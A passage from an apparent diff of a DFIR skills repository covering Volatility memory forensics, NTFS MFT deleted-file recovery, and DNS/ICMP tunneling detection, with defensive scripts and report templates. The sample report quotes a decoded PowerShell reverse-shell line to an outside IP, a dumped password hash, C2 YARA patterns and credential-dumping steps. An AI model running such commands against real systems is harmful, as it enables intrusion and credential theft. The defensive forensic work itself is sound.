vol3 -f memory.dmp yarascan.YaraScan --yara-file malware_rules.yar --pid 2184
|
||||
|
||||
# Built-in YARA scan for common patterns
|
||||
vol3 -f memory.dmp yarascan.YaraScan --yara-rules "rule FindC2 { strings: \$s1 = \"gate.php\" condition: \$s1 }"
|
||||
|
||||
# Scan for encryption key material
|
||||
vol3 -f memory.dmp yarascan.YaraScan --yara-rules "rule AES_Key { strings: \$sbox = { 63 7C 77 7B F2 6B 6F C5 } condition: \$sbox }"
|
||||
```
|
||||
|
||||
### Step 7: Timeline and Report Generation
|
||||
|
||||
Create an analysis timeline and compile findings:
|
||||
|
||||
```bash
|
||||
# Generate comprehensive timeline
|
||||
vol3 -f memory.dmp timeliner.Timeliner --output-file timeline.csv
|
||||
|
||||
# Timeline includes:
|
||||
# - Process creation/exit times
|
||||
# - Network connection timestamps
|
||||
# - Registry modification times
|
||||
# - File access times
|
||||
|
||||
# Export process list for reporting
|
||||
vol3 -f memory.dmp windows.pslist --output csv > processes.csv
|
||||
|
||||
# Export network connections
|
||||
vol3 -f memory.dmp windows.netscan --output csv > network.csv
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Memory Forensics** | Analysis of volatile memory (RAM) contents to identify running processes, network connections, and in-memory artifacts that may not exist on disk |
|
||||
| **Process Hollowing** | Malware technique of creating a legitimate process in suspended state, replacing its memory with malicious code, then resuming execution |
|
||||
| **Malfind** | Volatility plugin detecting injected code by identifying memory regions with executable permissions and PE headers in non-image VADs |
|
||||
| **VAD (Virtual Address Descriptor)** | Windows kernel structure tracking memory regions allocated to a process; anomalies in VADs indicate injection or hollowing |
|
||||
| **EPROCESS** | Windows kernel structure representing a process; rootkits unlink EPROCESS entries to hide processes from standard tools |
|
||||
| **Pool Tag Scanning** | Memory forensics technique scanning for kernel object pool tags to find objects (processes, files, connections) even when unlinked |
|
||||
| **Fileless Malware** | Malware that operates entirely in memory without creating files on disk; only detectable through memory forensics |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Volatility 3**: Open-source memory forensics framework supporting Windows, Linux, and macOS memory analysis with plugin architecture
|
||||
- **WinPmem**: Memory acquisition tool for Windows systems that creates raw memory dumps for offline analysis
|
||||
- **LiME (Linux Memory Extractor)**: Loadable kernel module for capturing Linux system memory dumps
|
||||
- **Rekall**: Alternative memory forensics framework with some unique analysis capabilities (discontinued but still useful)
|
||||
- **MemProcFS**: Memory process file system allowing mounting memory dumps as file systems for intuitive analysis
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Detecting Fileless Malware After EDR Alert
|
||||
|
||||
**Context**: EDR detected suspicious PowerShell activity but the threat actor cleaned up disk artifacts. A memory dump was captured before the system was rebooted. The analysis needs to identify the malware, its persistence mechanism, and any lateral movement.
|
||||
|
||||
**Approach**:
|
||||
1. Run `windows.pstree` to identify the process chain (which process spawned PowerShell)
|
||||
2. Run `windows.malfind` to detect injected code in running processes
|
||||
3. Dump the suspicious process memory and extract strings for C2 URLs
|
||||
4. Run `windows.netscan` to identify network connections from the compromised processes
|
||||
5. Run `windows.cmdline` to see what commands PowerShell executed
|
||||
6. Scan with YARA rules for known malware families in the dumped process memory
|
||||
7. Extract credentials with `hashdump` and `lsadump` to assess lateral movement risk
|
||||
|
||||
**Pitfalls**:
|
||||
- Using the wrong symbol tables for the OS version (causes plugin failures or incorrect results)
|
||||
- Not comparing `pslist` vs `psscan` output (missing rootkit-hidden processes)
|
||||
- Ignoring legitimate processes that have been injected into (focus on malfind results, not just process names)
|
||||
- Not extracting full process memory before concluding analysis (strings from process dump may reveal additional IOCs)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
MEMORY FORENSICS ANALYSIS REPORT
|
||||
===================================
|
||||
Dump File: memory.dmp
|
||||
Dump Size: 16 GB
|
||||
OS Version: Windows 10 21H2 (Build 19044)
|
||||
Capture Tool: WinPmem 4.0
|
||||
Capture Time: 2025-09-15 14:35:00 UTC
|
||||
|
||||
SUSPICIOUS PROCESSES
|
||||
PID PPID Name Path Anomaly
|
||||
2184 1052 svchost.exe C:\Users\Admin\AppData\Temp\svchost.exe Wrong path
|
||||
4012 2184 powershell.exe C:\Windows\System32\powershell.exe Child of fake svchost
|
||||
3456 4012 cmd.exe C:\Windows\System32\cmd.exe Spawned by PowerShell
|
||||
|
||||
CODE INJECTION DETECTED (malfind)
|
||||
PID 852 (explorer.exe):
|
||||
Address: 0x00400000 Size: 98304 Protection: PAGE_EXECUTE_READWRITE
|
||||
Header: MZ (embedded PE detected)
|
||||
SHA-256 of dump: abc123def456...
|
||||
|
||||
NETWORK CONNECTIONS
|
||||
PID Process Local Foreign State
|
||||
2184 svchost.exe 10.1.5.42:49152 185.220.101.42:443 ESTABLISHED
|
||||
4012 powershell.exe 10.1.5.42:49200 91.215.85.17:8080 ESTABLISHED
|
||||
|
||||
EXTRACTED CREDENTIALS
|
||||
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
|
||||
|
||||
COMMAND LINE HISTORY
|
||||
PID 4012: powershell.exe -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AA==
|
||||
Decoded: $client = New-Object System.Net.Sockets.TCPClient("185.220.101.42",443)
|
||||
|
||||
YARA MATCHES
|
||||
PID 2184: rule CobaltStrike_Beacon { matched at 0x00401200 }
|
||||
|
||||
TIMELINE
|
||||
14:10:00 svchost.exe (PID 2184) created from C:\Users\Admin\AppData\Temp\
|
||||
14:10:05 Network connection to 185.220.101.42:443 established
|
||||
14:12:30 powershell.exe (PID 4012) spawned by svchost.exe
|
||||
14:15:00 Code injection into explorer.exe (PID 852) detected
|
||||
14:20:00 Credential dump from LSASS process
|
||||
```
|
||||
@@ -0,0 +1,188 @@
|
||||
---
|
||||
name: analyzing-mft-for-deleted-file-recovery
|
||||
description: Analyze the NTFS Master File Table ($MFT) to recover metadata and content of deleted files by examining MFT record entries, $LogFile, $UsnJrnl, and MFT slack space using MFTECmd, analyzeMFT, and X-Ways Forensics.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [mft, ntfs, deleted-files, file-recovery, mftecmd, usn-journal, logfile, mft-slack-space, file-system-forensics, dfir]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing MFT for Deleted File Recovery
|
||||
|
||||
## Overview
|
||||
|
||||
The NTFS Master File Table ($MFT) is the central metadata repository for every file and directory on an NTFS volume. Each file is represented by at least one 1024-byte MFT record containing attributes such as $STANDARD_INFORMATION (timestamps, permissions), $FILE_NAME (name, parent directory, timestamps), and $DATA (file content or cluster run pointers). When a file is deleted, its MFT record is marked as inactive (InUse flag cleared) but the metadata remains until the entry is reallocated by a new file. This persistence makes MFT analysis a primary technique for recovering deleted file evidence, reconstructing file system timelines, and detecting anti-forensic activity such as timestomping.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Forensic disk image (E01, raw/dd, VMDK, or VHDX format)
|
||||
- MFTECmd (Eric Zimmerman) or analyzeMFT (Python-based)
|
||||
- FTK Imager, Arsenal Image Mounter, or similar for image mounting
|
||||
- Timeline Explorer or Excel for CSV analysis
|
||||
- Python 3.8+ for custom analysis scripts
|
||||
- Understanding of NTFS file system internals
|
||||
|
||||
## MFT Structure and Record Layout
|
||||
|
||||
### MFT Record Header
|
||||
|
||||
Each MFT record begins with the signature "FILE" (0x46494C45) and contains:
|
||||
|
||||
| Offset | Size | Field |
|
||||
|--------|------|-------|
|
||||
| 0x00 | 4 bytes | Signature ("FILE") |
|
||||
| 0x04 | 2 bytes | Offset to update sequence |
|
||||
| 0x06 | 2 bytes | Size of update sequence |
|
||||
| 0x08 | 8 bytes | $LogFile sequence number |
|
||||
| 0x10 | 2 bytes | Sequence number |
|
||||
| 0x12 | 2 bytes | Hard link count |
|
||||
| 0x14 | 2 bytes | Offset to first attribute |
|
||||
| 0x16 | 2 bytes | Flags (0x01 = InUse, 0x02 = Directory) |
|
||||
| 0x18 | 4 bytes | Used size of MFT record |
|
||||
| 0x1C | 4 bytes | Allocated size of MFT record |
|
||||
| 0x20 | 8 bytes | Base file record reference |
|
||||
| 0x28 | 2 bytes | Next attribute ID |
|
||||
|
||||
### Key MFT Attributes
|
||||
|
||||
| Type ID | Name | Description |
|
||||
|---------|------|-------------|
|
||||
| 0x10 | $STANDARD_INFORMATION | Timestamps, flags, owner ID, security ID |
|
||||
| 0x30 | $FILE_NAME | Filename, parent MFT reference, timestamps |
|
||||
| 0x40 | $OBJECT_ID | Unique GUID for the file |
|
||||
| 0x50 | $SECURITY_DESCRIPTOR | ACL permissions |
|
||||
| 0x60 | $VOLUME_NAME | Volume label (volume metadata files only) |
|
||||
| 0x80 | $DATA | File content (resident if <700 bytes) or cluster run list |
|
||||
| 0x90 | $INDEX_ROOT | B-tree index root for directories |
|
||||
| 0xA0 | $INDEX_ALLOCATION | B-tree index entries for large directories |
|
||||
| 0xB0 | $BITMAP | Allocation bitmap for index or MFT |
|
||||
|
||||
## Deleted File Recovery Techniques
|
||||
|
||||
### Technique 1: MFT Record Analysis with MFTECmd
|
||||
|
||||
```powershell
|
||||
# Extract $MFT from forensic image using KAPE or FTK Imager
|
||||
# Parse the $MFT with MFTECmd
|
||||
MFTECmd.exe -f "C:\Evidence\$MFT" --csv C:\Output --csvf mft_full.csv
|
||||
|
||||
# Filter for deleted files (InUse = FALSE) in Timeline Explorer
|
||||
# Look for entries where InUse column is False
|
||||
```
|
||||
|
||||
**Identifying Deleted Files in CSV Output:**
|
||||
- `InUse` = False indicates a deleted or reallocated record
|
||||
- `ParentPath` shows original file location before deletion
|
||||
- `FileSize` shows the original size (may still be recoverable)
|
||||
- Timestamps in `$STANDARD_INFORMATION` and `$FILE_NAME` attributes persist
|
||||
|
||||
### Technique 2: USN Journal ($UsnJrnl:$J) Analysis
|
||||
|
||||
The USN Journal records all changes to files on an NTFS volume, including creation, deletion, rename, and data modification events.
|
||||
|
||||
```powershell
|
||||
# Parse USN Journal with MFTECmd
|
||||
MFTECmd.exe -f "C:\Evidence\$J" --csv C:\Output --csvf usn_journal.csv
|
||||
|
||||
# Key USN reason codes for deletion evidence:
|
||||
# USN_REASON_FILE_DELETE = 0x00000200
|
||||
# USN_REASON_CLOSE = 0x80000000
|
||||
# USN_REASON_RENAME_OLD_NAME = 0x00001000
|
||||
# USN_REASON_RENAME_NEW_NAME = 0x00002000
|
||||
```
|
||||
|
||||
### Technique 3: $LogFile Transaction Analysis
|
||||
|
||||
The $LogFile stores NTFS transaction records that can reveal file operations even after the USN Journal has been cycled.
|
||||
|
||||
```powershell
|
||||
# Parse $LogFile with LogFileParser
|
||||
LogFileParser.exe -l "C:\Evidence\$LogFile" -o C:\Output
|
||||
|
||||
# Look for REDO and UNDO operations indicating file deletion:
|
||||
# - DeallocateFileRecordSegment
|
||||
# - DeleteAttribute
|
||||
# - UpdateResidentValue (clearing InUse flag)
|
||||
```
|
||||
|
||||
### Technique 4: MFT Slack Space Analysis
|
||||
|
||||
MFT slack space exists between the end of the used portion of an MFT record and the end of the allocated 1024 bytes. This area may contain remnants of previous file records.
|
||||
|
||||
```python
|
||||
import struct
|
||||
|
||||
def parse_mft_slack(mft_path: str, output_path: str):
|
||||
"""Extract and analyze MFT slack space for deleted file remnants."""
|
||||
with open(mft_path, "rb") as f:
|
||||
record_size = 1024
|
||||
record_num = 0
|
||||
slack_findings = []
|
||||
|
||||
while True:
|
||||
record = f.read(record_size)
|
||||
if len(record) < record_size:
|
||||
break
|
||||
|
||||
# Verify FILE signature
|
||||
if record[:4] != b"FILE":
|
||||
record_num += 1
|
||||
continue
|
||||
|
||||
# Get used size from offset 0x18
|
||||
used_size = struct.unpack("<I", record[0x18:0x1C])[0]
|
||||
|
||||
if used_size < record_size:
|
||||
slack = record[used_size:]
|
||||
# Check if slack contains readable strings or attribute headers
|
||||
if any(c > 0x20 and c < 0x7F for c in slack[:50]):
|
||||
slack_findings.append({
|
||||
"record": record_num,
|
||||
"used_size": used_size,
|
||||
"slack_size": record_size - used_size,
|
||||
"slack_preview": slack[:100].hex()
|
||||
})
|
||||
|
||||
record_num += 1
|
||||
|
||||
return slack_findings
|
||||
```
|
||||
|
||||
## Correlation with Supporting Artifacts
|
||||
|
||||
### Cross-Reference MFT with $Recycle.Bin
|
||||
|
||||
```powershell
|
||||
# Parse Recycle Bin with RBCmd
|
||||
RBCmd.exe -d "C:\Evidence\$Recycle.Bin" --csv C:\Output --csvf recycle_bin.csv
|
||||
|
||||
# Correlate: $I files contain original path and deletion timestamp
|
||||
# Match MFT entry numbers from $R files back to original MFT records
|
||||
```
|
||||
|
||||
### Cross-Reference MFT with Volume Shadow Copies
|
||||
|
||||
```powershell
|
||||
# List volume shadow copies
|
||||
vssadmin list shadows
|
||||
|
||||
# Mount shadow copies and extract $MFT from each
|
||||
# Compare MFT records across shadow copies to track file changes over time
|
||||
```
|
||||
|
||||
## Forensic Value
|
||||
|
||||
- **Deleted file metadata recovery**: Original filename, path, size, and timestamps
|
||||
- **Timeline reconstruction**: File creation, modification, access, and deletion events
|
||||
- **Timestomping detection**: Comparing $SI vs $FN timestamps
|
||||
- **Data carving guidance**: MFT cluster runs point to file content on disk
|
||||
- **Anti-forensic detection**: Identifying wiped or manipulated MFT records
|
||||
|
||||
## References
|
||||
|
||||
- NTFS MFT Advanced Forensic Analysis: https://www.deaddisk.com/posts/ntfs-mft-advanced-forensic-analysis-guide/
|
||||
- MFT Slack Space Forensic Value: https://www.sygnia.co/blog/the-forensic-value-of-mft-slack-space/
|
||||
- MFTECmd Documentation: https://ericzimmerman.github.io/
|
||||
- SANS FOR500: Windows Forensic Analysis
|
||||
@@ -0,0 +1,31 @@
|
||||
# MFT Deleted File Recovery Report Template
|
||||
|
||||
## Case Information
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| Case Number | |
|
||||
| Examiner | |
|
||||
| Date | |
|
||||
| Evidence Source | |
|
||||
| MFT Hash (SHA-256) | |
|
||||
|
||||
## Summary Statistics
|
||||
| Metric | Count |
|
||||
|--------|-------|
|
||||
| Total MFT Records | |
|
||||
| Active Records | |
|
||||
| Deleted Records | |
|
||||
| Timestomped Records | |
|
||||
|
||||
## Deleted Files of Interest
|
||||
| Entry # | Filename | Original Path | Size | Created | Modified |
|
||||
|---------|----------|---------------|------|---------|----------|
|
||||
| | | | | | |
|
||||
|
||||
## Timestomping Indicators
|
||||
| Entry # | Filename | $SI Created | $FN Created | Delta |
|
||||
|---------|----------|------------|------------|-------|
|
||||
| | | | | |
|
||||
|
||||
## Conclusion
|
||||
_(Summary of deleted file recovery findings)_
|
||||
@@ -0,0 +1,28 @@
|
||||
# Standards and References - MFT Deleted File Recovery
|
||||
|
||||
## Standards
|
||||
- NIST SP 800-86: Guide to Integrating Forensic Techniques into Incident Response
|
||||
- ISO/IEC 27037: Guidelines for identification, collection, acquisition and preservation of digital evidence
|
||||
- SWGDE Best Practices for Computer Forensics
|
||||
|
||||
## Key Technical References
|
||||
- NTFS Documentation (Microsoft): File system internals and MFT structure
|
||||
- MFTECmd by Eric Zimmerman: Primary parsing tool for $MFT, $J, $LogFile, $Boot
|
||||
- analyzeMFT (Python): Open-source MFT parser for cross-platform analysis
|
||||
- ntfstool (GitHub): Forensics tool for NTFS parsing, MFT, BitLocker, deleted files
|
||||
|
||||
## MITRE ATT&CK Mappings
|
||||
- T1070.004 - Indicator Removal: File Deletion
|
||||
- T1070.006 - Indicator Removal: Timestomping
|
||||
- T1485 - Data Destruction
|
||||
- T1561 - Disk Wipe
|
||||
|
||||
## NTFS Specifications
|
||||
- MFT Record Size: 1024 bytes (default)
|
||||
- MFT Entry 0: $MFT (self-reference)
|
||||
- MFT Entry 1: $MFTMirr (mirror of first 4 entries)
|
||||
- MFT Entry 2: $LogFile (transaction log)
|
||||
- MFT Entry 5: Root directory
|
||||
- MFT Entry 6: $Bitmap (cluster allocation)
|
||||
- MFT Entry 8: $BadClus (bad cluster list)
|
||||
- MFT Entry 11: $Extend (extended metadata)
|
||||
@@ -0,0 +1,46 @@
|
||||
# Workflows - MFT Deleted File Recovery
|
||||
|
||||
## Workflow 1: Basic Deleted File Discovery
|
||||
```
|
||||
Extract $MFT from forensic image
|
||||
|
|
||||
Parse with MFTECmd to CSV
|
||||
|
|
||||
Filter for InUse = False (deleted records)
|
||||
|
|
||||
Analyze ParentPath, FileName, FileSize
|
||||
|
|
||||
Cross-reference with USN Journal for deletion timestamps
|
||||
|
|
||||
Document findings with original paths and timestamps
|
||||
```
|
||||
|
||||
## Workflow 2: MFT Slack Space Recovery
|
||||
```
|
||||
Extract raw $MFT binary
|
||||
|
|
||||
Parse each 1024-byte record
|
||||
|
|
||||
Compare used_size vs allocated_size (1024)
|
||||
|
|
||||
Extract slack bytes between used and allocated
|
||||
|
|
||||
Search for attribute headers (0x10, 0x30, 0x80)
|
||||
|
|
||||
Reconstruct partial file metadata from slack data
|
||||
```
|
||||
|
||||
## Workflow 3: Timeline Reconstruction
|
||||
```
|
||||
Parse $MFT for all timestamps ($SI and $FN)
|
||||
|
|
||||
Parse $J (USN Journal) for change records
|
||||
|
|
||||
Parse $LogFile for transaction records
|
||||
|
|
||||
Merge into unified timeline
|
||||
|
|
||||
Identify file creation, modification, deletion sequences
|
||||
|
|
||||
Flag timestomping indicators ($SI Created < $FN Created)
|
||||
```
|
||||
@@ -0,0 +1,118 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
MFT Deleted File Recovery Analyzer
|
||||
|
||||
Parses MFT CSV output from MFTECmd to identify deleted files,
|
||||
detect timestomping, and generate recovery reports.
|
||||
"""
|
||||
|
||||
import csv
|
||||
import json
|
||||
import sys
|
||||
import os
|
||||
from datetime import datetime
|
||||
from collections import defaultdict
|
||||
|
||||
|
||||
class MFTDeletedFileAnalyzer:
|
||||
"""Analyze MFTECmd CSV output for deleted file recovery."""
|
||||
|
||||
def __init__(self, mft_csv_path: str, output_dir: str):
|
||||
self.mft_csv_path = mft_csv_path
|
||||
self.output_dir = output_dir
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
self.deleted_files = []
|
||||
self.timestomped_files = []
|
||||
self.all_records = []
|
||||
|
||||
def parse_csv(self):
|
||||
"""Parse MFTECmd CSV output."""
|
||||
with open(self.mft_csv_path, "r", encoding="utf-8-sig") as f:
|
||||
reader = csv.DictReader(f)
|
||||
for row in reader:
|
||||
self.all_records.append(row)
|
||||
if row.get("InUse", "").lower() == "false":
|
||||
self.deleted_files.append(row)
|
||||
|
||||
def detect_timestomping(self):
|
||||
"""Identify files with timestomping indicators."""
|
||||
for row in self.all_records:
|
||||
si_created = row.get("Created0x10", "")
|
||||
fn_created = row.get("Created0x30", "")
|
||||
if si_created and fn_created and si_created != fn_created:
|
||||
try:
|
||||
si_dt = datetime.fromisoformat(si_created.replace("Z", "+00:00"))
|
||||
fn_dt = datetime.fromisoformat(fn_created.replace("Z", "+00:00"))
|
||||
if si_dt < fn_dt:
|
||||
self.timestomped_files.append({
|
||||
"entry_number": row.get("EntryNumber", ""),
|
||||
"filename": row.get("FileName", ""),
|
||||
"parent_path": row.get("ParentPath", ""),
|
||||
"si_created": si_created,
|
||||
"fn_created": fn_created,
|
||||
"delta_seconds": (fn_dt - si_dt).total_seconds()
|
||||
})
|
||||
except (ValueError, TypeError):
|
||||
continue
|
||||
|
||||
def analyze_deleted_by_extension(self) -> dict:
|
||||
"""Categorize deleted files by extension."""
|
||||
by_ext = defaultdict(list)
|
||||
for record in self.deleted_files:
|
||||
ext = record.get("Extension", "NO_EXT").upper()
|
||||
by_ext[ext].append({
|
||||
"filename": record.get("FileName", ""),
|
||||
"parent_path": record.get("ParentPath", ""),
|
||||
"file_size": record.get("FileSize", ""),
|
||||
"created": record.get("Created0x10", ""),
|
||||
"modified": record.get("LastModified0x10", "")
|
||||
})
|
||||
return dict(by_ext)
|
||||
|
||||
def generate_report(self) -> str:
|
||||
"""Generate comprehensive analysis report."""
|
||||
self.parse_csv()
|
||||
self.detect_timestomping()
|
||||
ext_analysis = self.analyze_deleted_by_extension()
|
||||
|
||||
report = {
|
||||
"analysis_timestamp": datetime.now().isoformat(),
|
||||
"source_file": self.mft_csv_path,
|
||||
"total_records": len(self.all_records),
|
||||
"deleted_records": len(self.deleted_files),
|
||||
"timestomped_records": len(self.timestomped_files),
|
||||
"deleted_by_extension": {k: len(v) for k, v in ext_analysis.items()},
|
||||
"timestomping_details": self.timestomped_files[:50],
|
||||
"notable_deleted_files": [
|
||||
{
|
||||
"filename": r.get("FileName", ""),
|
||||
"parent_path": r.get("ParentPath", ""),
|
||||
"file_size": r.get("FileSize", ""),
|
||||
"entry_number": r.get("EntryNumber", "")
|
||||
}
|
||||
for r in self.deleted_files[:100]
|
||||
]
|
||||
}
|
||||
|
||||
report_path = os.path.join(self.output_dir, "mft_deleted_analysis.json")
|
||||
with open(report_path, "w") as f:
|
||||
json.dump(report, f, indent=2)
|
||||
|
||||
print(f"[*] Total MFT records: {report['total_records']}")
|
||||
print(f"[*] Deleted records: {report['deleted_records']}")
|
||||
print(f"[*] Timestomped records: {report['timestomped_records']}")
|
||||
print(f"[*] Report saved to: {report_path}")
|
||||
return report_path
|
||||
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 3:
|
||||
print("Usage: python process.py <mft_csv_path> <output_dir>")
|
||||
sys.exit(1)
|
||||
|
||||
analyzer = MFTDeletedFileAnalyzer(sys.argv[1], sys.argv[2])
|
||||
analyzer.generate_report()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,185 @@
|
||||
---
|
||||
name: analyzing-network-covert-channels-in-malware
|
||||
description: Detect and analyze covert communication channels used by malware including DNS tunneling, ICMP exfiltration, steganographic HTTP, and protocol abuse for C2 and data exfiltration.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [covert-channels, dns-tunneling, icmp-exfiltration, malware-analysis, network-forensics, c2-detection, data-exfiltration]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Network Covert Channels in Malware
|
||||
|
||||
## Overview
|
||||
|
||||
Malware uses covert channels to disguise C2 communication and data exfiltration within legitimate-looking network traffic. DNS tunneling encodes data in DNS queries and responses (used by tools like iodine, dnscat2, and malware families like FrameworkPOS). ICMP tunneling hides data in echo request/reply payloads (icmpsh, ptunnel). HTTP covert channels embed C2 data in headers, cookies, or steganographic images. Protocol abuse exploits allowed protocols to bypass firewalls. DNS tunneling detection achieves 99%+ recall with modern ML-based approaches, though low-throughput exfiltration remains challenging. Palo Alto Unit42 tracked three major DNS tunneling campaigns (TrkCdn, SecShow, Savvy Seahorse) through 2024, showing the technique's continued prevalence.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `scapy`, `dpkt`, `dnslib`
|
||||
- Wireshark/tshark for PCAP analysis
|
||||
- Zeek (formerly Bro) for network monitoring
|
||||
- DNS query logging infrastructure
|
||||
- Understanding of DNS, ICMP, HTTP protocols at packet level
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: DNS Tunneling Detection
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
"""Detect DNS tunneling and covert channels in network traffic."""
|
||||
import sys
|
||||
import json
|
||||
import math
|
||||
from collections import Counter, defaultdict
|
||||
|
||||
try:
|
||||
from scapy.all import rdpcap, DNS, DNSQR, DNSRR, IP, ICMP
|
||||
except ImportError:
|
||||
print("pip install scapy")
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def entropy(data):
|
||||
if not data:
|
||||
return 0
|
||||
freq = Counter(data)
|
||||
length = len(data)
|
||||
return -sum((c/length) * math.log2(c/length) for c in freq.values())
|
||||
|
||||
|
||||
def analyze_dns_tunneling(pcap_path):
|
||||
"""Detect DNS tunneling indicators in PCAP."""
|
||||
packets = rdpcap(pcap_path)
|
||||
domain_stats = defaultdict(lambda: {
|
||||
"queries": 0, "total_qname_len": 0, "subdomain_lengths": [],
|
||||
"query_types": Counter(), "unique_subdomains": set(),
|
||||
})
|
||||
|
||||
for pkt in packets:
|
||||
if pkt.haslayer(DNS) and pkt.haslayer(DNSQR):
|
||||
qname = pkt[DNSQR].qname.decode('utf-8', errors='replace').rstrip('.')
|
||||
qtype = pkt[DNSQR].qtype
|
||||
|
||||
parts = qname.split('.')
|
||||
if len(parts) >= 3:
|
||||
base_domain = '.'.join(parts[-2:])
|
||||
subdomain = '.'.join(parts[:-2])
|
||||
|
||||
stats = domain_stats[base_domain]
|
||||
stats["queries"] += 1
|
||||
stats["total_qname_len"] += len(qname)
|
||||
stats["subdomain_lengths"].append(len(subdomain))
|
||||
stats["query_types"][qtype] += 1
|
||||
stats["unique_subdomains"].add(subdomain)
|
||||
|
||||
# Score domains for tunneling indicators
|
||||
suspicious = []
|
||||
for domain, stats in domain_stats.items():
|
||||
if stats["queries"] < 5:
|
||||
continue
|
||||
|
||||
avg_subdomain_len = (sum(stats["subdomain_lengths"]) /
|
||||
len(stats["subdomain_lengths"]))
|
||||
unique_ratio = len(stats["unique_subdomains"]) / stats["queries"]
|
||||
|
||||
# Calculate subdomain entropy
|
||||
all_subdomains = ''.join(stats["unique_subdomains"])
|
||||
sub_entropy = entropy(all_subdomains)
|
||||
|
||||
score = 0
|
||||
reasons = []
|
||||
|
||||
if avg_subdomain_len > 30:
|
||||
score += 30
|
||||
reasons.append(f"Long subdomains (avg {avg_subdomain_len:.0f} chars)")
|
||||
if unique_ratio > 0.9:
|
||||
score += 25
|
||||
reasons.append(f"High uniqueness ({unique_ratio:.2%})")
|
||||
if sub_entropy > 4.0:
|
||||
score += 25
|
||||
reasons.append(f"High entropy ({sub_entropy:.2f})")
|
||||
if stats["query_types"].get(16, 0) > 10: # TXT records
|
||||
score += 20
|
||||
reasons.append(f"Many TXT queries ({stats['query_types'][16]})")
|
||||
|
||||
if score >= 50:
|
||||
suspicious.append({
|
||||
"domain": domain,
|
||||
"score": score,
|
||||
"queries": stats["queries"],
|
||||
"avg_subdomain_length": round(avg_subdomain_len, 1),
|
||||
"unique_subdomains": len(stats["unique_subdomains"]),
|
||||
"subdomain_entropy": round(sub_entropy, 2),
|
||||
"reasons": reasons,
|
||||
})
|
||||
|
||||
return sorted(suspicious, key=lambda x: -x["score"])
|
||||
|
||||
|
||||
def analyze_icmp_tunneling(pcap_path):
|
||||
"""Detect ICMP tunneling in PCAP."""
|
||||
packets = rdpcap(pcap_path)
|
||||
icmp_stats = defaultdict(lambda: {"count": 0, "payload_sizes": [], "payloads": []})
|
||||
|
||||
for pkt in packets:
|
||||
if pkt.haslayer(ICMP) and pkt.haslayer(IP):
|
||||
src = pkt[IP].src
|
||||
dst = pkt[IP].dst
|
||||
key = f"{src}->{dst}"
|
||||
|
||||
payload = bytes(pkt[ICMP].payload)
|
||||
icmp_stats[key]["count"] += 1
|
||||
icmp_stats[key]["payload_sizes"].append(len(payload))
|
||||
if len(payload) > 64:
|
||||
icmp_stats[key]["payloads"].append(payload[:100])
|
||||
|
||||
suspicious = []
|
||||
for flow, stats in icmp_stats.items():
|
||||
if stats["count"] < 5:
|
||||
continue
|
||||
avg_size = sum(stats["payload_sizes"]) / len(stats["payload_sizes"])
|
||||
if avg_size > 64 or stats["count"] > 100:
|
||||
suspicious.append({
|
||||
"flow": flow,
|
||||
"packets": stats["count"],
|
||||
"avg_payload_size": round(avg_size, 1),
|
||||
"reason": "Large/frequent ICMP payloads suggest tunneling",
|
||||
})
|
||||
|
||||
return suspicious
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 2:
|
||||
print(f"Usage: {sys.argv[0]} <pcap_file>")
|
||||
sys.exit(1)
|
||||
|
||||
print("[+] DNS Tunneling Analysis")
|
||||
dns_results = analyze_dns_tunneling(sys.argv[1])
|
||||
for r in dns_results:
|
||||
print(f" {r['domain']} (score: {r['score']})")
|
||||
for reason in r['reasons']:
|
||||
print(f" - {reason}")
|
||||
|
||||
print("\n[+] ICMP Tunneling Analysis")
|
||||
icmp_results = analyze_icmp_tunneling(sys.argv[1])
|
||||
for r in icmp_results:
|
||||
print(f" {r['flow']}: {r['reason']}")
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- DNS tunneling detected via entropy, subdomain length, and query volume analysis
|
||||
- ICMP covert channels identified through payload size anomalies
|
||||
- Tunneling domains distinguished from legitimate CDN/cloud traffic
|
||||
- Data exfiltration volume estimated from captured traffic
|
||||
- C2 communication patterns and beaconing intervals extracted
|
||||
|
||||
## References
|
||||
|
||||
- [Palo Alto Unit42 - DNS Tunneling Campaigns](https://unit42.paloaltonetworks.com/three-dns-tunneling-campaigns/)
|
||||
- [Elastic - Detecting Covert Data Exfiltration](https://www.elastic.co/blog/elastic-security-detecting-covert-data-exfiltration)
|
||||
- [Vectra AI - ICMP Tunnel Detection](https://www.vectra.ai/detections/icmp-tunnel)
|
||||
- [MITRE ATT&CK T1071 - Application Layer Protocol](https://attack.mitre.org/techniques/T1071/)
|
||||
@@ -0,0 +1,25 @@
|
||||
# Analysis Report Template - analyzing-network-covert-channels-in-malware
|
||||
|
||||
## Sample Information
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| SHA-256 | |
|
||||
| File Type | |
|
||||
| Analysis Date | |
|
||||
| Analyst | |
|
||||
| Classification | TLP:AMBER |
|
||||
|
||||
## Findings
|
||||
| Finding | Severity | Details |
|
||||
|---------|----------|---------|
|
||||
| | | |
|
||||
|
||||
## IOCs Extracted
|
||||
